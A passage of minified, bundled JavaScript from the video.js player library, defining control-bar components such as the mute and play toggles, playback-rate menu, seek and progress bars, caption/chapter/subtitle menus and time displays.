d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../component"),h=d(g),i=a("../utils/dom.js"),j=d(i),k=function(a){function b(){e(this,b),null!=a&&a.apply(this,arguments)}return f(b,a),b.prototype.createEl=function(){var b=a.prototype.createEl.call(this,"div",{className:"vjs-live-control vjs-control"});return this.contentEl_=j.createEl("div",{className:"vjs-live-display",innerHTML:'<span class="vjs-control-text">'+this.localize("Stream Type")+"</span>"+this.localize("LIVE"),"aria-live":"off"}),b.appendChild(this.contentEl_),b},b}(h["default"]);h["default"].registerComponent("LiveDisplay",k),c["default"]=k,b.exports=c["default"]},{"../component":52,"../utils/dom.js":111}],56:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../button"),h=d(g),i=a("../component"),j=d(i),k=a("../utils/dom.js"),l=d(k),m=function(a){function b(c,d){e(this,b),a.call(this,c,d),this.on(c,"volumechange",this.update),c.tech&&c.tech.featuresVolumeControl===!1&&this.addClass("vjs-hidden"),this.on(c,"loadstart",function(){c.tech.featuresVolumeControl===!1?this.addClass("vjs-hidden"):this.removeClass("vjs-hidden")})}return f(b,a),b.prototype.buildCSSClass=function(){return"vjs-mute-control "+a.prototype.buildCSSClass.call(this)},b.prototype.handleClick=function(){this.player_.muted(this.player_.muted()?!1:!0)},b.prototype.update=function(){var a=this.player_.volume(),b=3;0===a||this.player_.muted()?b=0:.33>a?b=1:.67>a&&(b=2);var c=this.player_.muted()?"Unmute":"Mute",d=this.localize(c);this.controlText()!==d&&this.controlText(d);for(var e=0;4>e;e++)l.removeElClass(this.el_,"vjs-vol-"+e);l.addElClass(this.el_,"vjs-vol-"+b)},b}(h["default"]);m.prototype.controlText_="Mute",j["default"].registerComponent("MuteToggle",m),c["default"]=m,b.exports=c["default"]},{"../button":51,"../component":52,"../utils/dom.js":111}],57:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../button.js"),h=d(g),i=a("../component.js"),j=d(i),k=function(a){function b(c,d){e(this,b),a.call(this,c,d),this.on(c,"play",this.handlePlay),this.on(c,"pause",this.handlePause)}return f(b,a),b.prototype.buildCSSClass=function(){return"vjs-play-control "+a.prototype.buildCSSClass.call(this)},b.prototype.handleClick=function(){this.player_.paused()?this.player_.play():this.player_.pause()},b.prototype.handlePlay=function(){this.removeClass("vjs-paused"),this.addClass("vjs-playing"),this.controlText("Pause")},b.prototype.handlePause=function(){this.removeClass("vjs-playing"),this.addClass("vjs-paused"),this.controlText("Play")},b}(h["default"]);k.prototype.controlText_="Play",j["default"].registerComponent("PlayToggle",k),c["default"]=k,b.exports=c["default"]},{"../button.js":51,"../component.js":52}],58:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../../menu/menu-button.js"),h=d(g),i=a("../../menu/menu.js"),j=d(i),k=a("./playback-rate-menu-item.js"),l=d(k),m=a("../../component.js"),n=d(m),o=a("../../utils/dom.js"),p=d(o),q=function(a){function b(c,d){e(this,b),a.call(this,c,d),this.updateVisibility(),this.updateLabel(),this.on(c,"loadstart",this.updateVisibility),this.on(c,"ratechange",this.updateLabel)}return f(b,a),b.prototype.createEl=function(){var b=a.prototype.createEl.call(this);return this.labelEl_=p.createEl("div",{className:"vjs-playback-rate-value",innerHTML:1}),b.appendChild(this.labelEl_),b},b.prototype.buildCSSClass=function(){return"vjs-playback-rate "+a.prototype.buildCSSClass.call(this)},b.prototype.createMenu=function(){var a=new j["default"](this.player()),b=this.playbackRates();if(b)for(var c=b.length-1;c>=0;c--)a.addChild(new l["default"](this.player(),{rate:b[c]+"x"}));return a},b.prototype.updateARIAAttributes=function(){this.el().setAttribute("aria-valuenow",this.player().playbackRate())},b.prototype.handleClick=function(){for(var a=this.player().playbackRate(),b=this.playbackRates(),c=b[0],d=0;d<b.length;d++)if(b[d]>a){c=b[d];break}this.player().playbackRate(c)},b.prototype.playbackRates=function(){return this.options_.playbackRates||this.options_.playerOptions&&this.options_.playerOptions.playbackRates},b.prototype.playbackRateSupported=function(){return this.player().tech&&this.player().tech.featuresPlaybackRate&&this.playbackRates()&&this.playbackRates().length>0},b.prototype.updateVisibility=function(){this.playbackRateSupported()?this.removeClass("vjs-hidden"):this.addClass("vjs-hidden")},b.prototype.updateLabel=function(){this.playbackRateSupported()&&(this.labelEl_.innerHTML=this.player().playbackRate()+"x")},b}(h["default"]);q.prototype.controlText_="Playback Rate",n["default"].registerComponent("PlaybackRateMenuButton",q),c["default"]=q,b.exports=c["default"]},{"../../component.js":52,"../../menu/menu-button.js":89,"../../menu/menu.js":91,"../../utils/dom.js":111,"./playback-rate-menu-item.js":59}],59:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../../menu/menu-item.js"),h=d(g),i=a("../../component.js"),j=d(i),k=function(a){function b(c,d){e(this,b);var f=d.rate,g=parseFloat(f,10);d.label=f,d.selected=1===g,a.call(this,c,d),this.label=f,this.rate=g,this.on(c,"ratechange",this.update)}return f(b,a),b.prototype.handleClick=function(){a.prototype.handleClick.call(this),this.player().playbackRate(this.rate)},b.prototype.update=function(){this.selected(this.player().playbackRate()===this.rate)},b}(h["default"]);k.prototype.contentElType="button",j["default"].registerComponent("PlaybackRateMenuItem",k),c["default"]=k,b.exports=c["default"]},{"../../component.js":52,"../../menu/menu-item.js":90}],60:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../../component.js"),h=d(g),i=a("../../utils/dom.js"),j=d(i),k=function(a){function b(c,d){e(this,b),a.call(this,c,d),this.on(c,"progress",this.update)}return f(b,a),b.prototype.createEl=function(){return a.prototype.createEl.call(this,"div",{className:"vjs-load-progress",innerHTML:'<span class="vjs-control-text"><span>'+this.localize("Loaded")+"</span>: 0%</span>"})},b.prototype.update=function(){var a=this.player_.buffered(),b=this.player_.duration(),c=this.player_.bufferedEnd(),d=this.el_.children,e=function(a,b){var c=a/b||0;return 100*(c>=1?1:c)+"%"};this.el_.style.width=e(c,b);for(var f=0;f<a.length;f++){var g=a.start(f),h=a.end(f),i=d[f];i||(i=this.el_.appendChild(j.createEl())),i.style.left=e(g,c),i.style.width=e(h-g,c)}for(var f=d.length;f>a.length;f--)this.el_.removeChild(d[f-1])},b}(h["default"]);h["default"].registerComponent("LoadProgressBar",k),c["default"]=k,b.exports=c["default"]},{"../../component.js":52,"../../utils/dom.js":111}],61:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../../component.js"),h=d(g),i=a("../../utils/fn.js"),j=d(i),k=a("../../utils/format-time.js"),l=d(k),m=function(a){function b(c,d){e(this,b),a.call(this,c,d),this.on(c,"timeupdate",this.updateDataAttr),c.ready(j.bind(this,this.updateDataAttr))}return f(b,a),b.prototype.createEl=function(){return a.prototype.createEl.call(this,"div",{className:"vjs-play-progress",innerHTML:'<span class="vjs-control-text"><span>'+this.localize("Progress")+"</span>: 0%</span>"})},b.prototype.updateDataAttr=function(){var a=this.player_.scrubbing()?this.player_.getCache().currentTime:this.player_.currentTime();this.el_.setAttribute("data-current-time",l["default"](a,this.player_.duration()))},b}(h["default"]);h["default"].registerComponent("PlayProgressBar",m),c["default"]=m,b.exports=c["default"]},{"../../component.js":52,"../../utils/fn.js":113,"../../utils/format-time.js":114}],62:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../../component.js"),h=d(g),i=a("./seek-bar.js"),j=(d(i),function(a){function b(){e(this,b),null!=a&&a.apply(this,arguments)}return f(b,a),b.prototype.createEl=function(){return a.prototype.createEl.call(this,"div",{className:"vjs-progress-control vjs-control"})},b}(h["default"]));j.prototype.options_={children:{seekBar:{}}},h["default"].registerComponent("ProgressControl",j),c["default"]=j,b.exports=c["default"]},{"../../component.js":52,"./seek-bar.js":63}],63:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../../slider/slider.js"),h=d(g),i=a("../../component.js"),j=d(i),k=a("./load-progress-bar.js"),l=(d(k),a("./play-progress-bar.js")),m=(d(l),a("../../utils/fn.js")),n=d(m),o=a("../../utils/format-time.js"),p=d(o),q=a("../../utils/round-float.js"),r=d(q),s=function(a){function b(c,d){e(this,b),a.call(this,c,d),this.on(c,"timeupdate",this.updateARIAAttributes),c.ready(n.bind(this,this.updateARIAAttributes))}return f(b,a),b.prototype.createEl=function(){return a.prototype.createEl.call(this,"div",{className:"vjs-progress-holder","aria-label":"video progress bar"})},b.prototype.updateARIAAttributes=function(){var a=this.player_.scrubbing()?this.player_.getCache().currentTime:this.player_.currentTime();this.el_.setAttribute("aria-valuenow",r["default"](100*this.getPercent(),2)),this.el_.setAttribute("aria-valuetext",p["default"](a,this.player_.duration()))},b.prototype.getPercent=function(){var a=this.player_.currentTime()/this.player_.duration();return a>=1?1:a},b.prototype.handleMouseDown=function(b){a.prototype.handleMouseDown.call(this,b),this.player_.scrubbing(!0),this.videoWasPlaying=!this.player_.paused(),this.player_.pause()},b.prototype.handleMouseMove=function(a){var b=this.calculateDistance(a)*this.player_.duration();b===this.player_.duration()&&(b-=.1),this.player_.currentTime(b)},b.prototype.handleMouseUp=function(b){a.prototype.handleMouseUp.call(this,b),this.player_.scrubbing(!1),this.videoWasPlaying&&this.player_.play()},b.prototype.stepForward=function(){this.player_.currentTime(this.player_.currentTime()+5)},b.prototype.stepBack=function(){this.player_.currentTime(this.player_.currentTime()-5)},b}(h["default"]);s.prototype.options_={children:{loadProgressBar:{},playProgressBar:{}},barName:"playProgressBar"},s.prototype.playerEvent="timeupdate",j["default"].registerComponent("SeekBar",s),c["default"]=s,b.exports=c["default"]},{"../../component.js":52,"../../slider/slider.js":96,"../../utils/fn.js":113,"../../utils/format-time.js":114,"../../utils/round-float.js":118,"./load-progress-bar.js":60,"./play-progress-bar.js":61}],64:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("./spacer.js"),h=d(g),i=a("../../component.js"),j=d(i),k=function(a){function b(){e(this,b),null!=a&&a.apply(this,arguments)}return f(b,a),b.prototype.buildCSSClass=function(){return"vjs-custom-control-spacer "+a.prototype.buildCSSClass.call(this)},b.prototype.createEl=function(){return a.prototype.createEl.call(this,{className:this.buildCSSClass()})},b}(h["default"]);j["default"].registerComponent("CustomControlSpacer",k),c["default"]=k,b.exports=c["default"]},{"../../component.js":52,"./spacer.js":65}],65:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../../component.js"),h=d(g),i=function(a){function b(){e(this,b),null!=a&&a.apply(this,arguments)}return f(b,a),b.prototype.buildCSSClass=function(){return"vjs-spacer "+a.prototype.buildCSSClass.call(this)},b.prototype.createEl=function(){return a.prototype.createEl.call(this,"div",{className:this.buildCSSClass()})},b}(h["default"]);h["default"].registerComponent("Spacer",i),c["default"]=i,b.exports=c["default"]},{"../../component.js":52}],66:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("./text-track-menu-item.js"),h=d(g),i=a("../../component.js"),j=d(i),k=function(a){function b(c,d){e(this,b),d.track={kind:d.kind,player:c,label:d.kind+" settings","default":!1,mode:"disabled"},a.call(this,c,d),this.addClass("vjs-texttrack-settings")}return f(b,a),b.prototype.handleClick=function(){this.player().getChild("textTrackSettings").show()},b}(h["default"]);j["default"].registerComponent("CaptionSettingsMenuItem",k),c["default"]=k,b.exports=c["default"]},{"../../component.js":52,"./text-track-menu-item.js":73}],67:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("./text-track-button.js"),h=d(g),i=a("../../component.js"),j=d(i),k=a("./caption-settings-menu-item.js"),l=d(k),m=function(a){function b(c,d,f){e(this,b),a.call(this,c,d,f),this.el_.setAttribute("aria-label","Captions Menu")}return f(b,a),b.prototype.buildCSSClass=function(){return"vjs-captions-button "+a.prototype.buildCSSClass.call(this)},b.prototype.update=function(){var b=2;a.prototype.update.call(this),this.player().tech&&this.player().tech.featuresNativeTextTracks&&(b=1),this.items&&this.items.length>b?this.show():this.hide()},b.prototype.createItems=function(){var b=[];return this.player().tech&&this.player().tech.featuresNativeTextTracks||b.push(new l["default"](this.player_,{kind:this.kind_})),a.prototype.createItems.call(this,b)},b}(h["default"]);m.prototype.kind_="captions",m.prototype.controlText_="Captions",j["default"].registerComponent("CaptionsButton",m),c["default"]=m,b.exports=c["default"]},{"../../component.js":52,"./caption-settings-menu-item.js":66,"./text-track-button.js":72}],68:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("./text-track-button.js"),h=d(g),i=a("../../component.js"),j=d(i),k=a("./text-track-menu-item.js"),l=d(k),m=a("./chapters-track-menu-item.js"),n=d(m),o=a("../../menu/menu.js"),p=d(o),q=a("../../utils/dom.js"),r=d(q),s=a("../../utils/fn.js"),t=d(s),u=a("../../utils/to-title-case.js"),v=d(u),w=a("global/window"),x=d(w),y=function(a){function b(c,d,f){e(this,b),a.call(this,c,d,f),this.el_.setAttribute("aria-label","Chapters Menu")}return f(b,a),b.prototype.buildCSSClass=function(){return"vjs-chapters-button "+a.prototype.buildCSSClass.call(this)},b.prototype.createItems=function(){var a=[],b=this.player_.textTracks();if(!b)return a;for(var c=0;c<b.length;c++){var d=b[c];d.kind===this.kind_&&a.push(new l["default"](this.player_,{track:d}))}return a},b.prototype.createMenu=function(){for(var a=this.player_.textTracks()||[],b=void 0,c=this.items=[],d=0,e=a.length;e>d;d++){var f=a[d];if(f.kind===this.kind_){if(f.cues){b=f;break}f.mode="hidden",x["default"].setTimeout(t.bind(this,function(){this.createMenu()}),100)}}var g=this.menu;if(void 0===g&&(g=new p["default"](this.player_),g.contentEl().appendChild(r.createEl("li",{className:"vjs-menu-title",innerHTML:v["default"](this.kind_),tabIndex:-1}))),b){for(var h=b.cues,i=void 0,d=0,e=h.length;e>d;d++){i=h[d];var j=new n["default"](this.player_,{track:b,cue:i});c.push(j),g.addChild(j)}this.addChild(g)}return this.items.length>0&&this.show(),g},b}(h["default"]);y.prototype.kind_="chapters",y.prototype.controlText_="Chapters",j["default"].registerComponent("ChaptersButton",y),c["default"]=y,b.exports=c["default"]},{"../../component.js":52,"../../menu/menu.js":91,"../../utils/dom.js":111,"../../utils/fn.js":113,"../../utils/to-title-case.js":120,"./chapters-track-menu-item.js":69,"./text-track-button.js":72,"./text-track-menu-item.js":73,"global/window":2}],69:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../../menu/menu-item.js"),h=d(g),i=a("../../component.js"),j=d(i),k=a("../../utils/fn.js"),l=d(k),m=function(a){function b(c,d){e(this,b);var f=d.track,g=d.cue,h=c.currentTime();d.label=g.text,d.selected=g.startTime<=h&&h<g.endTime,a.call(this,c,d),this.track=f,this.cue=g,f.addEventListener("cuechange",l.bind(this,this.update))}return f(b,a),b.prototype.handleClick=function(){a.prototype.handleClick.call(this),this.player_.currentTime(this.cue.startTime),this.update(this.cue.startTime)},b.prototype.update=function(){var a=this.cue,b=this.player_.currentTime();this.selected(a.startTime<=b&&b<a.endTime)},b}(h["default"]);j["default"].registerComponent("ChaptersTrackMenuItem",m),c["default"]=m,b.exports=c["default"]},{"../../component.js":52,"../../menu/menu-item.js":90,"../../utils/fn.js":113}],70:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("./text-track-menu-item.js"),h=d(g),i=a("../../component.js"),j=d(i),k=function(a){function b(c,d){e(this,b),d.track={kind:d.kind,player:c,label:d.kind+" off","default":!1,mode:"disabled"},a.call(this,c,d),this.selected(!0)}return f(b,a),b.prototype.handleTracksChange=function(){for(var a=this.player().textTracks(),b=!0,c=0,d=a.length;d>c;c++){var e=a[c];if(e.kind===this.track.kind&&"showing"===e.mode){b=!1;break}}this.selected(b)},b}(h["default"]);j["default"].registerComponent("OffTextTrackMenuItem",k),c["default"]=k,b.exports=c["default"]},{"../../component.js":52,"./text-track-menu-item.js":73}],71:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("./text-track-button.js"),h=d(g),i=a("../../component.js"),j=d(i),k=function(a){function b(c,d,f){e(this,b),a.call(this,c,d,f),this.el_.setAttribute("aria-label","Subtitles Menu")}return f(b,a),b.prototype.buildCSSClass=function(){return"vjs-subtitles-button "+a.prototype.buildCSSClass.call(this)},b}(h["default"]);k.prototype.kind_="subtitles",k.prototype.controlText_="Subtitles",j["default"].registerComponent("SubtitlesButton",k),c["default"]=k,b.exports=c["default"]},{"../../component.js":52,"./text-track-button.js":72}],72:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../../menu/menu-button.js"),h=d(g),i=a("../../component.js"),j=d(i),k=a("../../utils/fn.js"),l=d(k),m=a("./text-track-menu-item.js"),n=d(m),o=a("./off-text-track-menu-item.js"),p=d(o),q=function(a){function b(c,d){e(this,b),a.call(this,c,d);var f=this.player_.textTracks();if(this.items.length<=1&&this.hide(),f){var g=l.bind(this,this.update);f.addEventListener("removetrack",g),f.addEventListener("addtrack",g),this.player_.on("dispose",function(){f.removeEventListener("removetrack",g),f.removeEventListener("addtrack",g)})}}return f(b,a),b.prototype.createItems=function(){var a=void 0===arguments[0]?[]:arguments[0];a.push(new p["default"](this.player_,{kind:this.kind_}));var b=this.player_.textTracks();if(!b)return a;for(var c=0;c<b.length;c++){var d=b[c];d.kind===this.kind_&&a.push(new n["default"](this.player_,{track:d}))}return a},b}(h["default"]);j["default"].registerComponent("TextTrackButton",q),c["default"]=q,b.exports=c["default"]},{"../../component.js":52,"../../menu/menu-button.js":89,"../../utils/fn.js":113,"./off-text-track-menu-item.js":70,"./text-track-menu-item.js":73}],73:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../../menu/menu-item.js"),h=d(g),i=a("../../component.js"),j=d(i),k=a("../../utils/fn.js"),l=d(k),m=a("global/window"),n=d(m),o=a("global/document"),p=d(o),q=function(a){function b(c,d){var f=this;e(this,b);var g=d.track,h=c.textTracks();d.label=g.label||g.language||"Unknown",d.selected=g["default"]||"showing"===g.mode,a.call(this,c,d),this.track=g,h&&!function(){var a=l.bind(f,f.handleTracksChange);h.addEventListener("change",a),f.on("dispose",function(){h.removeEventListener("change",a)})}(),h&&void 0===h.onchange&&!function(){var a=void 0;f.on(["tap","click"],function(){if("object"!=typeof n["default"].Event)try{a=new n["default"].Event("change")}catch(b){}a||(a=p["default"].createEvent("Event"),a.initEvent("change",!0,!0)),h.dispatchEvent(a)})}()}return f(b,a),b.prototype.handleClick=function(b){var c=this.track.kind,d=this.player_.textTracks();if(a.prototype.handleClick.call(this,b),d)for(var e=0;e<d.length;e++){var f=d[e];f.kind===c&&(f.mode=f===this.track?"showing":"disabled")}},b.prototype.handleTracksChange=function(){this.selected("showing"===this.track.mode)},b}(h["default"]);j["default"].registerComponent("TextTrackMenuItem",q),c["default"]=q,b.exports=c["default"]},{"../../component.js":52,"../../menu/menu-item.js":90,"../../utils/fn.js":113,"global/document":1,"global/window":2}],74:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../../component.js"),h=d(g),i=a("../../utils/dom.js"),j=d(i),k=a("../../utils/format-time.js"),l=d(k),m=function(a){function b(c,d){e(this,b),a.call(this,c,d),this.on(c,"timeupdate",this.updateContent)}return f(b,a),b.prototype.createEl=function(){var b=a.prototype.createEl.call(this,"div",{className:"vjs-current-time vjs-time-control vjs-control"});return this.contentEl_=j.createEl("div",{className:"vjs-current-time-display",innerHTML:'<span class="vjs-control-text">Current Time </span>0:00',"aria-live":"off"}),b.appendChild(this.contentEl_),b},b.prototype.updateContent=function(){var a=this.player_.scrubbing?this.player_.getCache().currentTime:this.player_.currentTime(),b=this.localize("Current Time"),c=l["default"](a,this.player_.duration());this.contentEl_.innerHTML='<span class="vjs-control-text">'+b+"</span> "+c},b}(h["default"]);h["default"].registerComponent("CurrentTimeDisplay",m),c["default"]=m,b.exports=c["default"]},{"../../component.js":52,"../../utils/dom.js":111,"../../utils/format-time.js":114}],75:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../../component.js"),h=d(g),i=a("../../utils/dom.js"),j=d(i),k=a("../../utils/format-time.js"),l=d(k),m=function(a){function b(c,d){e(this,b),a.call(this,c,d),this.on(c,"timeupdate",this.updateContent),this.on(c,"loadedmetadata",this.updateContent)}return f(b,a),b.prototype.createEl=function(){var b=a.prototype.createEl.call(this,"div",{className:"vjs-duration vjs-time-control vjs-control"});return this.contentEl_=j.createEl("div",{className:"vjs-duration-display",innerHTML:'<span class="vjs-control-text">'+this.localize("Duration Time")+"</span> 0:00","aria-live":"off"}),b.appendChild(this.contentEl_),b},b.prototype.updateContent=function(){var a=this.player_.duration();if(a){var b=this.localize("Duration Time"),c=l["default"](a);this.contentEl_.innerHTML='<span class="vjs-control-text">'+b+"</span> "+c}},b}(h["default"]);h["default"].registerComponent("DurationDisplay",m),c["default"]=m,b.exports=c["default"];
},{"../../component.js":52,"../../utils/dom.js":111,"../../utils/format-time.js":114}],76:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../../component.js"),h=d(g),i=a("../../utils/dom.js"),j=d(i),k=a("../../utils/format-time.js"),l=d(k),m=function(a){function b(c,d){e(this,b),a.call(this,c,d),this.on(c,"timeupdate",this.updateContent)}return f(b,a),b.prototype.createEl=function(){var b=a.prototype.createEl.call(this,"div",{className:"vjs-remaining-time vjs-time-control vjs-control"});return this.contentEl_=j.createEl("div",{className:"vjs-remaining-time-display",innerHTML:'<span class="vjs-control-text">'+this.localize("Remaining Time")+"</span> -0:00","aria-live":"off"}),b.appendChild(this.contentEl_),b},b.prototype.updateContent=function(){if(this.player_.duration()){var a=this.localize("Remaining Time"),b=l["default"](this.player_.remainingTime());this.contentEl_.innerHTML='<span class="vjs-control-text">'+a+"</span> -"+b}},b}(h["default"]);h["default"].registerComponent("RemainingTimeDisplay",m),c["default"]=m,b.exports=c["default"]},{"../../component.js":52,"../../utils/dom.js":111,"../../utils/format-time.js":114}],77:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new 